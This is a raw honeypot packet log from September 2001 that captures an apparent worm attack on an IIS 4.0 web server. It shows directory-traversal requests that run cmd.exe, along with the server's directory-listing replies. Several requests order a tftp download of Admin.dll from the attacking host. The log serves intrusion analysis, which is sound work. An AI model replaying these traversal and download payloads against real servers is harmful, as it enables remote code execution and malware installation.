TCP: port=4454 -> dport: 80 flags=***AP*** seq=483908464
ack=555059 off=5 res=0 win=8760 urp=0 chksum=17104
Payload: length = 71
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/...
010 : 2E 2F 41 64 6D 69 6E 2E 64 6C 6C 20 64 6C 6C 20 ./Admin.dll dll
020 : 48 54 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 HTTP/1.0..Host:
030 : 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F 6E www..Connnection
040 : 3A 20 63 6C 6F 73 65 : close
----------------------------------------------------------------------------
--
#(2 - 25609) [2001-09-18 10:21:42] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=318 ID=775 flags=0 offset=0 TTL=128 chksum=17790
TCP: port=80 -> dport: 4454 flags=***AP*** seq=555059
ack=483908541 off=5 res=0 win=8683 urp=0 chksum=18674
Payload: length = 278
000 : 48 54 54 50 2F 31 2E 31 20 35 30 30 20 53 65 72 HTTP/1.1 500 Ser
010 : 76 65 72 20 45 72 72 6F 72 0D 0A 53 65 72 76 65 ver Error..Serve
020 : 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 53 r: Microsoft-IIS
030 : 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 2C /4.0..Date: Tue,
040 : 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 3A 18 Sep 2001 16:
050 : 30 35 3A 32 33 20 47 4D 54 0D 0A 43 6F 6E 74 65 05:23 GMT..Conte
060 : 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 68 74 nt-Type: text/ht
070 : 6D 6C 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 ml..Content-Leng
080 : 74 68 3A 20 31 33 39 0D 0A 0D 0A 3C 68 74 6D 6C th: 139....<html
090 : 3E 3C 68 65 61 64 3E 3C 74 69 74 6C 65 3E 45 72
><head><title>Er
0a0 : 72 6F 72 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61
ror</title></hea
0b0 : 64 3E 3C 62 6F 64 79 3E 54 68 65 20 70 72 6F 63 d><body>The
proc
0c0 : 65 73 73 20 63 61 6E 6E 6F 74 20 61 63 63 65 73 ess cannot acces
0d0 : 73 20 74 68 65 20 66 69 6C 65 20 62 65 63 61 75 s the file becau
0e0 : 73 65 20 69 74 20 69 73 20 62 65 69 6E 67 20 75 se it is being u
0f0 : 73 65 64 20 62 79 20 61 6E 6F 74 68 65 72 20 70 sed by another p
100 : 72 6F 63 65 73 73 2E 20 3C 2F 62 6F 64 79 3E 3C rocess.
</body><
110 : 2F 68 74 6D 6C 3E /html>
----------------------------------------------------------------------------
--
#(2 - 25610) [2001-09-18 10:21:42] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=1031 flags=0 offset=0 TTL=128 chksum=17812
TCP: port=80 -> dport: 4454 flags=***A***F seq=555337
ack=483908541 off=5 res=0 win=8683 urp=0 chksum=22807
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25611) [2001-09-18 10:21:43] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=64630 flags=0 offset=0 TTL=118 chksum=22308
TCP: port=4454 -> dport: 80 flags=*****R** seq=483908541
ack=179402671 off=5 res=0 win=0 urp=0 chksum=29184
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25612) [2001-09-18 10:21:43] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=44 ID=64886 flags=0 offset=0 TTL=118 chksum=22048
TCP: port=4486 -> dport: 80 flags=******S* seq=483908786
ack=0 off=6 res=0 win=8192 urp=0 chksum=48017
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25613) [2001-09-18 10:21:43] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=44 ID=5127 flags=0 offset=0 TTL=128 chksum=13712
TCP: port=80 -> dport: 4486 flags=***A**S* seq=556149
ack=483908787 off=6 res=0 win=8760 urp=0 chksum=15563
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25614) [2001-09-18 10:21:43] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=65142 flags=0 offset=0 TTL=118 chksum=38180
TCP: port=4454 -> dport: 80 flags=*****R** seq=483908541
ack=483908541 off=5 res=0 win=0 urp=0 chksum=64459
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25615) [2001-09-18 10:21:43] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=6775 flags=0 offset=0 TTL=119 chksum=14372
TCP: port=4486 -> dport: 80 flags=***A**** seq=483908787
ack=556150 off=5 res=0 win=8760 urp=0 chksum=21640
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25616) [2001-09-18 10:21:43] WEB-IIS cmd.exe access
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=137 ID=7031 flags=0 offset=0 TTL=119 chksum=14019
TCP: port=4486 -> dport: 80 flags=***AP*** seq=483908787
ack=556150 off=5 res=0 win=8760 urp=0 chksum=38842
Payload: length = 91
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/...
010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 ./winnt/system32
020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 /cmd.exe?/c+dir
030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F dir HTTP/1.0..Ho
040 : 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 st: www..Connnec
050 : 74 69 6F 6E 3A 20 63 6C 6F 73 65 tion: close
----------------------------------------------------------------------------
--
#(2 - 25617) [2001-09-18 10:21:43] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=231 ID=6407 flags=0 offset=0 TTL=128 chksum=12245
TCP: port=80 -> dport: 4486 flags=***AP*** seq=556150
ack=483908884 off=5 res=0 win=8663 urp=0 chksum=720
Payload: length = 191
000 : 48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D HTTP/1.1 200 OK.
010 : 0A 53 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F .Server: Microso
020 : 66 74 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65 ft-IIS/4.0..Date
030 : 3A 20 54 75 65 2C 20 31 38 20 53 65 70 20 32 30 : Tue, 18 Sep 20
040 : 30 31 20 31 36 3A 30 35 3A 32 34 20 47 4D 54 0D 01 16:05:24 GMT.
050 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 .Content-Type: a
060 : 70 70 6C 69 63 61 74 69 6F 6E 2F 6F 63 74 65 74 pplication/octet
070 : 2D 73 74 72 65 61 6D 0D 0A 56 6F 6C 75 6D 65 20 -stream..Volume
080 : 69 6E 20 64 72 69 76 65 20 43 20 68 61 73 20 6E in drive C has n
090 : 6F 20 6C 61 62 65 6C 2E 0D 0A 56 6F 6C 75 6D 65 o label...Volume
0a0 : 20 53 65 72 69 61 6C 20 4E 75 6D 62 65 72 20 69 Serial Number i
0b0 : 73 20 38 30 42 34 2D 38 39 43 41 0D 0A 0D 0A s 80B4-89CA....
----------------------------------------------------------------------------
--
#(2 - 25618) [2001-09-18 10:21:43] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=403 ID=6663 flags=0 offset=0 TTL=128 chksum=11817
TCP: port=80 -> dport: 4486 flags=***AP**F seq=556341
ack=483908884 off=5 res=0 win=8663 urp=0 chksum=24388
Payload: length = 363
000 : 20 44 69 72 65 63 74 6F 72 79 20 6F 66 20 43 3A Directory of C:
010 : 5C 49 6E 65 74 70 75 62 5C 73 63 72 69 70 74 73 \Inetpub\scripts
020 : 0D 0A 0D 0A 30 39 2F 31 38 2F 30 31 20 20 31 31 ....09/18/01 11
030 : 3A 30 35 61 20 20 20 20 20 20 20 20 3C 44 49 52 :05a <DIR
040 : 3E 20 20 20 20 20 20 20 20 20 20 2E 0D 0A 30 39 > ...09
050 : 2F 31 38 2F 30 31 20 20 31 31 3A 30 35 61 20 20 /18/01 11:05a
060 : 20 20 20 20 20 20 3C 44 49 52 3E 20 20 20 20 20 <DIR>
070 : 20 20 20 20 20 2E 2E 0D 0A 30 39 2F 31 38 2F 30 ....09/18/0
080 : 31 20 20 31 31 3A 30 34 61 20 20 20 20 20 20 20 1 11:04a
090 : 20 20 20 20 20 20 20 20 20 35 37 2C 33 34 34 20 57,344
0a0 : 54 46 54 50 32 30 36 0D 0A 30 39 2F 31 38 2F 30 TFTP206..09/18/0
0b0 : 31 20 20 31 31 3A 30 35 61 20 20 20 20 20 20 20 1 11:05a
0c0 : 20 20 20 20 20 20 20 20 20 31 36 2C 33 38 34 20 16,384
0d0 : 54 46 54 50 32 32 32 0D 0A 30 39 2F 31 38 2F 30 TFTP222..09/18/0
0e0 : 31 20 20 31 31 3A 30 35 61 20 20 20 20 20 20 20 1 11:05a
0f0 : 20 20 20 20 20 20 20 20 20 35 37 2C 33 34 34 20 57,344
100 : 54 46 54 50 38 34 0D 0A 20 20 20 20 20 20 20 20 TFTP84..
110 : 20 20 20 20 20 20 20 35 20 46 69 6C 65 28 73 29 5 File(s)
120 : 20 20 20 20 20 20 20 20 31 33 31 2C 30 37 32 20 131,072
130 : 62 79 74 65 73 0D 0A 20 20 20 20 20 20 20 20 20 bytes..
140 : 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
150 : 20 32 2C 31 30 30 2C 35 34 33 2C 34 38 38 20 62 2,100,543,488 b
160 : 79 74 65 73 20 66 72 65 65 0D 0A ytes free..
----------------------------------------------------------------------------
--
#(2 - 25619) [2001-09-18 10:21:43] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=15479 flags=0 offset=0 TTL=118 chksum=5924
TCP: port=4486 -> dport: 80 flags=*****R** seq=483908884
ack=1832837531 off=5 res=0 win=0 urp=0 chksum=41999
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25620) [2001-09-18 10:21:43] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=44 ID=15735 flags=0 offset=0 TTL=118 chksum=5664
TCP: port=4519 -> dport: 80 flags=******S* seq=484037059
ack=0 off=6 res=0 win=8192 urp=0 chksum=50781
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25621) [2001-09-18 10:21:43] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=44 ID=7943 flags=0 offset=0 TTL=128 chksum=10896
TCP: port=80 -> dport: 4519 flags=***A**S* seq=556630
ack=484037060 off=6 res=0 win=8760 urp=0 chksum=17846
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25622) [2001-09-18 10:21:44] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=17015 flags=0 offset=0 TTL=118 chksum=20772
TCP: port=4486 -> dport: 80 flags=*****R** seq=483908884
ack=483908884 off=5 res=0 win=0 urp=0 chksum=63741
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25623) [2001-09-18 10:21:44] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=25975 flags=0 offset=0 TTL=119 chksum=60707
TCP: port=4519 -> dport: 80 flags=***A**** seq=484037060
ack=556631 off=5 res=0 win=8760 urp=0 chksum=23923
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25624) [2001-09-18 10:21:44] WEB-IIS cmd.exe access
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=192 ID=26231 flags=0 offset=0 TTL=119 chksum=60299
TCP: port=4519 -> dport: 80 flags=***AP*** seq=484037060
ack=556631 off=5 res=0 win=8760 urp=0 chksum=26065
Payload: length = 136
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/...
010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 ./winnt/system32
020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74 66 74 70 /cmd.exe?/c+tftp
030 : 20 2D 69 20 36 35 2E 32 39 2E 32 34 33 2E 31 38 -i 65.29.243.18
040 : 30 20 47 45 54 20 41 64 6D 69 6E 2E 64 6C 6C 20 0 GET Admin.dll
050 : 63 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 30 63 3A c:\Admin.dll 0c:
060 : 5C 41 64 6D 69 6E 2E 64 6C 6C 20 48 54 54 50 2F \Admin.dll HTTP/
070 : 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 1.0..Host: www..
080 : 43 6F 6E 6E 6E 65 63 74 Connnect
----------------------------------------------------------------------------
--
#(2 - 25625) [2001-09-18 10:21:44] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=395 ID=8711 flags=0 offset=0 TTL=128 chksum=9777
TCP: port=80 -> dport: 4519 flags=***AP*** seq=556631
ack=484037212 off=5 res=0 win=8608 urp=0 chksum=62259
Payload: length = 355
000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74 HTTP/1.1 502 Gat
010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76 eway Error..Serv
020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 er: Microsoft-II
030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 S/4.0..Date: Tue
040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 , 18 Sep 2001 16
050 : 3A 30 35 3A 32 34 20 47 4D 54 0D 0A 43 6F 6E 74 :05:24 GMT..Cont
060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D ent-Length: 215.
070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 .Content-Type: t
080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61 ext/html....<hea
090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69
d><title>Error i
0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F n CGI Applicatio
0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E
n</title></head>
0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45
.<body><h1>CGI E
0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65 rror</h1>The
spe
0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69 cified CGI appli
0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65 cation misbehave
100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69 d by not returni
110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65 ng a complete se
120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72 t of HTTP header
130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20 s. The headers
140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72 it did return ar
150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70
e:<p><p><pre></p
160 : 72 65 3E re>
----------------------------------------------------------------------------
--
#(2 - 25626) [2001-09-18 10:21:44] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=8967 flags=0 offset=0 TTL=128 chksum=9876
TCP: port=80 -> dport: 4519 flags=***A***F seq=556986
ack=484037212 off=5 res=0 win=8608 urp=0 chksum=23567
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25627) [2001-09-18 10:21:44] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=37751 flags=0 offset=0 TTL=118 chksum=49187
TCP: port=4519 -> dport: 80 flags=*****R** seq=484037212
ack=0 off=5 res=0 win=0 urp=0 chksum=64894
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25628) [2001-09-18 10:21:44] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=44 ID=38007 flags=0 offset=0 TTL=118 chksum=48927
TCP: port=4559 -> dport: 80 flags=******S* seq=484037472
ack=0 off=6 res=0 win=8192 urp=0 chksum=50328
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25629) [2001-09-18 10:21:44] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=44 ID=11015 flags=0 offset=0 TTL=128 chksum=7824
TCP: port=80 -> dport: 4559 flags=***A**S* seq=557271
ack=484037473 off=6 res=0 win=8760 urp=0 chksum=16752
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25630) [2001-09-18 10:21:44] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=40 ID=38263 flags=0 offset=0 TTL=118 chksum=65059
TCP: port=4519 -> dport: 80 flags=*****R** seq=484037212
ack=484037212 off=5 res=0 win=0 urp=0 chksum=3657
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25631) [2001-09-18 10:21:45] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=40 ID=632 flags=0 offset=0 TTL=119 chksum=20515
TCP: port=4559 -> dport: 80 flags=***A**** seq=484037473
ack=557272 off=5 res=0 win=8760 urp=0 chksum=22829
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25639) [2001-09-18 10:21:53] WEB-IIS cmd.exe access
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=192 ID=42111 flags=0 offset=0 TTL=119 chksum=44419
TCP: port=4559 -> dport: 80 flags=***AP*** seq=484037473
ack=557272 off=5 res=0 win=8760 urp=0 chksum=24715
Payload: length = 136
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/...
010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 ./winnt/system32
020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74 66 74 70 /cmd.exe?/c+tftp
030 : 20 2D 69 20 36 35 2E 32 39 2E 32 34 33 2E 31 38 -i 65.29.243.18
040 : 30 20 47 45 54 20 41 64 6D 69 6E 2E 64 6C 6C 20 0 GET Admin.dll
050 : 64 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 30 64 3A d:\Admin.dll 0d:
060 : 5C 41 64 6D 69 6E 2E 64 6C 6C 20 48 54 54 50 2F \Admin.dll HTTP/
070 : 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 1.0..Host: www..
080 : 43 6F 6E 6E 6E 65 63 74 Connnect
----------------------------------------------------------------------------
--
#(2 - 25640) [2001-09-18 10:21:53] Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
hlen=5 TOS=0 dlen=395 ID=30727 flags=0 offset=0 TTL=128 chksum=53296
TCP: port=80 -> dport: 4559 flags=***AP*** seq=557272
ack=484037625 off=5 res=0 win=8608 urp=0 chksum=60909
Payload: length = 355
000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74 HTTP/1.1 502 Gat
010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76 eway Error..Serv
020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 er: Microsoft-II
030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 S/4.0..Date: Tue
040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 , 18 Sep 2001 16
050 : 3A 30 35 3A 33 34 20 47 4D 54 0D 0A 43 6F 6E 74 :05:34 GMT..Cont
060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D ent-Length: 215.
070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 .Content-Type: t
080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61 ext/html....<hea
090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69
d><title>Error i
0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F n CGI Applicatio
0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E
n</title></head>
0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45
.<body><h1>CGI E
0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65 rror</h1>The
spe
0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69 cified CGI appli
0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65 cation misbehave
100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69 d by not returni
110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65 ng a complete se
120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72 t of HTTP header
130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20 s. The headers
140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72 it did return ar
150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70
e:<p><p><pre></p
160 : 72 65 3E re>
----------------------------------------------------------------------------
--
#(2 - 25641) [2001-09-18 10:21:53] Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=30983 flags=0 offset=0 TTL=128 chksum=53395
TCP: port=80 -> dport: 4559 flags=***A***F seq=557627
ack=484037625 off=5 res=0 win=8608 urp=0 chksum=22473
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25642) [2001-09-18 10:21:54] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=40 ID=49535 flags=0 offset=0 TTL=118 chksum=37403
TCP: port=4559 -> dport: 80 flags=*****R** seq=484037625
ack=0 off=5 res=0 win=0 urp=0 chksum=64441
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25643) [2001-09-18 10:21:54] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=44 ID=49791 flags=0 offset=0 TTL=118 chksum=37143
TCP: port=1476 -> dport: 80 flags=******S* seq=485198619
ack=0 off=6 res=0 win=8192 urp=0 chksum=6359
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25644) [2001-09-18 10:21:54] Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
hlen=5 TOS=0 dlen=44 ID=32263 flags=0 offset=0 TTL=128 chksum=52111
TCP: port=80 -> dport: 1476 flags=***A**S* seq=566664
ack=485198620 off=6 res=0 win=8760 urp=0 chksum=28925
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25645) [2001-09-18 10:21:54] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=40 ID=50047 flags=0 offset=0 TTL=118 chksum=53275
TCP: port=4559 -> dport: 80 flags=*****R** seq=484037625
ack=484037625 off=5 res=0 win=0 urp=0 chksum=2791
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25646) [2001-09-18 10:21:54] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=40 ID=60543 flags=0 offset=0 TTL=119 chksum=26139
TCP: port=1476 -> dport: 80 flags=***A**** seq=485198620
ack=566665 off=5 res=0 win=8760 urp=0 chksum=35002
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25647) [2001-09-18 10:21:54] WEB-IIS cmd.exe access
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=192 ID=60799 flags=0 offset=0 TTL=119 chksum=25731
TCP: port=1476 -> dport: 80 flags=***AP*** seq=485198620
ack=566665 off=5 res=0 win=8760 urp=0 chksum=36632
Payload: length = 136
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/...
010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 ./winnt/system32
020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74 66 74 70 /cmd.exe?/c+tftp
030 : 20 2D 69 20 36 35 2E 32 39 2E 32 34 33 2E 31 38 -i 65.29.243.18
040 : 30 20 47 45 54 20 41 64 6D 69 6E 2E 64 6C 6C 20 0 GET Admin.dll
050 : 65 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 30 65 3A e:\Admin.dll 0e:
060 : 5C 41 64 6D 69 6E 2E 64 6C 6C 20 48 54 54 50 2F \Admin.dll HTTP/
070 : 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 1.0..Host: www..
080 : 43 6F 6E 6E 6E 65 63 74 Connnect
----------------------------------------------------------------------------
--
#(2 - 25648) [2001-09-18 10:21:54] Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=33799 flags=0 offset=0 TTL=128 chksum=50579
TCP: port=80 -> dport: 1476 flags=***A**** seq=566665
ack=485198772 off=5 res=0 win=8608 urp=0 chksum=35002
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25766) [2001-09-18 10:22:49] Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
hlen=5 TOS=0 dlen=395 ID=26890 flags=0 offset=0 TTL=128 chksum=57133
TCP: port=80 -> dport: 1476 flags=***AP*** seq=566665
ack=485198772 off=5 res=0 win=8608 urp=0 chksum=7295
Payload: length = 355
000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74 HTTP/1.1 502 Gat
010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76 eway Error..Serv
020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 er: Microsoft-II
030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 S/4.0..Date: Tue
040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 , 18 Sep 2001 16
050 : 3A 30 36 3A 33 30 20 47 4D 54 0D 0A 43 6F 6E 74 :06:30 GMT..Cont
060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D ent-Length: 215.
070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 .Content-Type: t
080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61 ext/html....<hea
090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69
d><title>Error i
0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F n CGI Applicatio
0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E
n</title></head>
0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45
.<body><h1>CGI E
0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65 rror</h1>The
spe
0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69 cified CGI appli
0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65 cation misbehave
100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69 d by not returni
110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65 ng a complete se
120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72 t of HTTP header
130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20 s. The headers
140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72 it did return ar
150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70
e:<p><p><pre></p
160 : 72 65 3E re>
----------------------------------------------------------------------------
--
#(2 - 25767) [2001-09-18 10:22:49] Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=27146 flags=0 offset=0 TTL=128 chksum=57232
TCP: port=80 -> dport: 1476 flags=***A***F seq=567020
ack=485198772 off=5 res=0 win=8608 urp=0 chksum=34646
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25769) [2001-09-18 10:22:50] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=40 ID=19119 flags=0 offset=0 TTL=118 chksum=2284
TCP: port=1476 -> dport: 80 flags=*****R** seq=485198772
ack=0 off=5 res=0 win=0 urp=0 chksum=20472
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25776) [2001-09-18 10:22:52] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
